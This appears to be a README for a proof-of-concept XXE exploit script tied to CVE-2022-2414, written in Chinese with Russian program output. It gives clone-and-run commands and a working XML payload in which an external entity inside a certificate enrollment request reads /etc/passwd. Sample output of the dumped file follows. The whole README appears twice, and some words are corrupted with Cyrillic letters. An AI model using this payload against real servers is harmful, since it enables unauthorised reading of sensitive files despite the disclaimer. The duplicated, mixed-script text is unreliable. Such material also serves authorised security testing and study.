GenXMLExternalEntityExploit 是一个用于演示 XML 外部实体(XXE)漏洞利用的 PoC 脚本。该脚本利用 XML 载荷读取目标服务器上的敏感文件。它可用于安全测试、渗透测试或教育目的。
git clone https://github.com/geniuszly/CVE-2022-2414
cd CVE-2022-2414
python3 GenXMLExternalEntityExploit.py
TARGET_URL 变量,将其指向你要测试的目标服务器。XML_PAYLOAD 字符串,以指定特定的文件路径或服务端操作。默认情况下,脚本使用以下载荷读取 /etc/passwd 文件:
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...
本工具仅用于教育目的和经授权的安全测试。作者不对任何非法使用本工具的行为负责。
GenXMLExternalEntityExploit 是一个用于演示 XML 外部实体(XXE)漏洞利用的 PoC 脚本。该脚本使用 XML 载荷从目标服务器读取机密文件。可用于安全测试、渗透测试或教育目的。
git clone https://github.com/geniuszly/CVE-2022-2414
cd CVE-2022-2414
python3 GenXMLExternalEntityExploit.py
TARGET_URL 变量改为你要测试的服务器 URL 地址。XML_PAYLOAD 字符串,以指定具体文件或服务端操作。默认情况下,脚本使用以下载荷读取 /etc/passwd 文件:
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...
本工具仅用于教育目的和经授权的安全测试。作者不对任何非法使用本工具的行为负责。